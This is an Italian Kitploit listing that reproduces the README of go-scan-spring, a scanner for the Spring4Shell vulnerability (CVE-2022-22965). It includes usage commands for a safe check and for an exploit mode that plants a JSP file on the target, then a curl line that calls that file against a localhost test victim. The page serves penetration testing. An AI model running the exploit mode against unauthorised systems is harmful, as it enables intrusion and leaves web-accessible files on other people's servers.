Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
go-scan-spring — Scanner di vulnerabilità per Spring4Shell (CVE-2022-22965) | Kitploit
Strumenti/GitHubGitHub/fracturelabs/go-scan-spring
Scanner di VulnerabilitàAnalisi Dinamica (Sandboxing)ExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubfracturelabs/go-scan-spring

go-scan-spring

Scanner di vulnerabilità per Spring4Shell (CVE-2022-22965)

Vedi Repository
1224 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi


go-scan-spring

Scanner di vulnerabilità per trovare vulnerabilità Spring4Shell (CVE-2022-22965)

Per maggiori informazioni: https://www.fracturelabs.com/posts/effective-spring4shell-scanning-exploitation/

@fracturelabs @brkr19


Compilazione

root@kitploit:~
[~/opt] $ git clone https://github.com/fracturelabs/go-scan-spring.git
[~/opt] $ cd go-scan-spring

Utilizzo

Aiuto

root@kitploit:~
[~/opt/go-scan-spring] $ go run main.go help scan

Esegue una scansione degli URL target alla ricerca di servizi vulnerabili

Utilizzo:
  go-scan-spring scan [flags]

Flags:
  -f, --file string         Nome file URL target (- per stdin)
      --follow-redirect     Segui i reindirizzamenti
  -h, --help                aiuto per scan
      --http-get            Test con richieste HTTP GET (impostare =false per disabilitare) (default true)
      --http-post           Test con richieste HTTP POST (impostare =false per disabilitare) (default true)
      --identifier string   Identificatore univoco della scansione (usato come password e nome file exploit) (default "go-scan-spring")
  -x, --proxy string        Proxy upstream
      --run-baseline        Esegue un test di base per verificare se l'endpoint è attivo
      --run-exploit         Esegue un exploit per recuperare il proprietario del processo Tomcat
      --run-safe            Esegue un test sicuro per verificare se l'endpoint è vulnerabile
  -s, --sleep int           Tempo di pausa tra i passi dell'exploit. Necessario per consentire il tempo di deployment. (default 10)
  -t, --threads int         Numero di thread (default 5)

Global Flags:
      --debug   abilita log di debug

Scansione sicura di base

root@kitploit:~
[~/opt/go-scan-spring] $ go run main.go scan --run-safe -f urls.txt

Exploit sicuro di base

Usa il tuo parametro identifier univoco!

root@kitploit:~
# Usando HTTP GET e POST
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit

# Usando solo HTTP GET
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-post=false

# Usando solo HTTP POST
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-get=false

Verifica

Puoi verificare che lo script funzioni correttamente testandolo contro un sistema deliberatamente vulnerabile, come spring4shell_victim

root@kitploit:~
[~] $ curl --output - 'http://localhost:8080/go-scan-spring/550bafe0-0c6c-4f3e-a46b-0901c28e690b-AD.jsp?pwd=550bafe0-0c6c-4f3e-a46b-0901c28e690b'

Crediti

  • L'intera struttura e diverse funzioni sono state ampiamente prese in prestito dal meraviglioso progetto GoWitness di SensePost.
  • Il controllo sicuro implementato qui è stato ispirato da The Randori Attack Team e Zach Grace
  • Chiunque abbia creato il primo PoC - le cose si muovono troppo velocemente per attribuirlo correttamente in questo momento!
Scarica lo strumento